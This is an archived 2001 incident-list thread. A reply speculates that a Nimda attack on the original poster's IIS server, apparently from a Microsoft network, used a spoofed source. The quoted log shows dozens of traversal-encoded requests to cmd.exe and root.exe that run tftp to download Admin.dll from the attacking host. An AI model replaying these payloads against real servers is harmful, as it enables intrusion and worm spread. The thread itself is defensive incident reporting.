Re: Microsoft's Early Xmas Present.

From: mcoleman (mcolemanat_private)
Date: Sat Dec 29 2001 - 23:05:43 PST
Next message: Richard Gilman: "Possible ICMP DOS spoofed to Nameservers?"
Previous message: Jay D. Dyson: "Microsoft's Early Xmas Present."
Maybe in reply to: Jay D. Dyson: "Microsoft's Early Xmas Present."
Next in thread: Jay D. Dyson: "Re: Microsoft's Early Xmas Present."
Reply: Jay D. Dyson: "Re: Microsoft's Early Xmas Present."
Reply: Valdis.Kletnieksat_private: "Re: Microsoft's Early Xmas Present."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi Jay,

     These logs you included appear to be logs from the web server itself,
correct?  Or, are these logs from something else that formats them this way?

     If these are the actual web server logs, then my point might be
somewhat moot, but it could be trivial to fake M$'s source IP address in a
GET request to possibly trick your early bird software to give you and M$ a
holiday assache.

     If these are logs from the web server itself, then the 3-way handshake
must have happened and that is really hard to spoof source IP without
predictable sequence numbers, maybe someone spoofing directly upstream from
you?  If you don't have stateful protection on your firewall and your
earlybird software just sniffs signatures off of the wire like Snort does,
then someone could generate SYNed/ACKed packets (to get past Established
Filters) containing Nimda GET requests using whatever source IP they wanted,
and could maybe trick a "signature sniffing" reporting system, and your web
server would just ignore them...?

    Then, there's always the possibility that M$ got infected, but you have
to consider all angles.  Far be it for me to defend M$, but you have to keep
an open mind about everything these days.  I don't believe anything unless
it is proven.  Completion of a 3-way handshake would be strong evidence for
me though.

     On a whim, I would consider looking up www.whitehouse.gov and see if
the earlybird saw and reported attacks from that network as well, as this
would likely be another target that a trickster would use to try to embarass
you.

     That early bird software is a great idea, but I see it easily abused
unless strong precautions are in place.  I am sorry I am not familiar with
that software, it may be much deeper than I am giving it credit for, I just
thought it important to throw this possibility to you tonight in case that
is what is happening.  Good luck.. please let us know the outcome of this.

-Mark Coleman


-----Original Message-----
From: Jay D. Dyson <jdysonat_private>
To: Incidents List <incidentsat_private>
Date: Saturday, December 29, 2001 11:27 PM
Subject: Microsoft's Early Xmas Present.


>-----BEGIN PGP SIGNED MESSAGE-----
>
>Hi folks,
>
> Normally I wouldn't be sending this out, but I figure folks need
>to be aware and wary, considering the origin of this intrusion attempt.
>
> I received an early Xmas present from Microsoft.  No, I didn't get
>XP, nor did I get the latest Office software suite.
>
> I got a Nimda intrusion attempt.
>
> Early Bird[1] picked up on this intrusion attempt and immediately
>notified Microsoft.  I've yet to hear back from Microsoft as to why this
>attack from their network came to pass[2].
>
> For those who are interested, here's the log excerpt.
>
>208.229.100.126 - - [24/Dec/2001:19:34:36 -0800] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 200 367 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:34:46 -0800] "GET
/scripts/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.d
ll HTTP/1.0" 200 421 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:34:56 -0800] "GET /scripts/Admin.dll
HTTP/1.0" 200 361 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:35:06 -0800] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 200 365 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:35:17 -0800] "GET
/MSADC/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll
HTTP/1.0" 200 419 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:35:27 -0800] "GET /MSADC/Admin.dll
HTTP/1.0" 200 359 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:35:37 -0800] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:35:51 -0800] "GET
/c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%2
0c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:36:07 -0800] "GET
/c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%2
0d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:36:18 -0800] "GET
/c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%2
0e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:36:28 -0800] "GET /c/Admin.dll
HTTP/1.0" 200 355 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:36:38 -0800] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:36:49 -0800] "GET
/d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%2
0c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:36:59 -0800] "GET
/d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%2
0d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:37:09 -0800] "GET
/d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%2
0e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:37:23 -0800] "GET /d/Admin.dll
HTTP/1.0" 200 355 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:37:39 -0800] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:37:54 -0800] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20G
ET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:38:10 -0800] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20G
ET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:38:24 -0800] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20G
ET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:38:35 -0800] "GET
/scripts/..%255c../Admin.dll HTTP/1.0" 200 371 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:38:45 -0800] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 200 412 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:39:00 -0800] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:39:11 -0800] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:39:25 -0800] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:39:40 -0800] "GET
/_vti_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:39:51 -0800] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 200 412 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:40:06 -0800] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:40:17 -0800] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:40:31 -0800] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:40:46 -0800] "GET
/_mem_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:40:57 -0800] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 200 440 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:41:12 -0800] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.d
ll HTTP/1.0" 200 497 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:41:23 -0800] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.d
ll HTTP/1.0" 200 497 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:41:37 -0800] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.d
ll HTTP/1.0" 200 497 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:41:52 -0800] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../Admin.dl
l HTTP/1.0" 200 420 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:42:03 -0800] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:42:18 -0800] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20
GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:42:29 -0800] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20
GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:42:43 -0800] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20
GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:42:58 -0800] "GET
/scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 372 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:43:19 -0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20
GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:43:29 -0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20
GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:43:40 -0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20
GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:43:50 -0800] "GET
/scripts/..%c0%af../Admin.dll HTTP/1.0" 200 372 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:44:09 -0800] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:44:20 -0800] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20
GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:44:31 -0800] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20
GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:44:41 -0800] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20
GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:44:51 -0800] "GET
/scripts/..%c1%9c../Admin.dll HTTP/1.0" 200 372 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:45:01 -0800] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 395 "-"
"-"
>208.229.100.126 - - [24/Dec/2001:19:45:12 -0800] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126
%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 452 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:45:23 -0800] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126
%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 452 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:45:33 -0800] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126
%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 452 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:45:43 -0800] "GET
/scripts/..%25%35%63../Admin.dll HTTP/1.0" 200 375 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:45:57 -0800] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:46:13 -0800] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20G
ET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:46:28 -0800] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20G
ET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:46:44 -0800] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20G
ET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"
>208.229.100.126 - - [24/Dec/2001:19:46:58 -0800] "GET
/scripts/..%252f../Admin.dll HTTP/1.0" 200 371 "-" "-"
>
>$ whois -h whois.arin.net 208.229.100.126
>
>Microsoft Labs (NETBLK-UU-208-229-100-D1)
>   One Microsoft Way
>   Redmond, WA 98052
>   US
>
>   Netname: UU-208-229-100-D1
>   Netblock: 208.229.100.0 - 208.229.101.255
>
>   Coordinator:
>      Steig, Rick  (RS8676-ARIN)  a-rickstat_private
>      (425) 703-3061
>
>   Record last updated on 03-Nov-1997.
>   Database last updated on  27-Dec-2001 19:55:32 EDT.
>
>- -Jay
>
>1. http://www.treachery.net/earlybird/
>2. If anyone from Microsoft is reading this, I'd appreciate something
> more pleasant next holiday season.  (FYI, the machine you hit ran
> XP for only 15 seconds.  It now runs Linux.)
>
>   (    (                                                        _______
>   ))   ))   .-"There's always time for a good cup of coffee"-.   >====<--.
> C|~~|C|~~| (>----- Jay D. Dyson -- jdysonat_private -----<) |    = |-'
>  `--' `--'  `---------- Si vis pacem, para bellum. ----------'  `------'
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>Comment: See http://www.treachery.net/~jdyson/ for current keys.
>
>iQCVAwUBPC0YPrlDRyqRQ2a9AQFXDAQAoXxjVbh6fTzpUPyQFB8aJGpxOLg/+Om+
>1Zck8Fw7/tfKsq97YLSqSsp2r4Q5+ybQqXxdnbLVgVsPhKhazzXNrcPKWXhYQU8q
>BYT1edg658tvKND0I5NeWoU+vzqzR0NPtppmBKCEMlwz+zG2Nz3nTzT7jMpzmxPo
>uNDtpRKBcGs=
>=9DpW
>-----END PGP SIGNATURE-----
>
>
>---------------------------------------------------------------------------
-
>This list is provided by the SecurityFocus ARIS analyzer service.
>For more information on this free incident handling, management
>and tracking system please see: http://aris.securityfocus.com


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Next message: Richard Gilman: "Possible ICMP DOS spoofed to Nameservers?"
Previous message: Jay D. Dyson: "Microsoft's Early Xmas Present."
Maybe in reply to: Jay D. Dyson: "Microsoft's Early Xmas Present."
Next in thread: Jay D. Dyson: "Re: Microsoft's Early Xmas Present."
Reply: Jay D. Dyson: "Re: Microsoft's Early Xmas Present."
Reply: Valdis.Kletnieksat_private: "Re: Microsoft's Early Xmas Present."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b30 : Sun Dec 30 2001 - 16:43:03 PST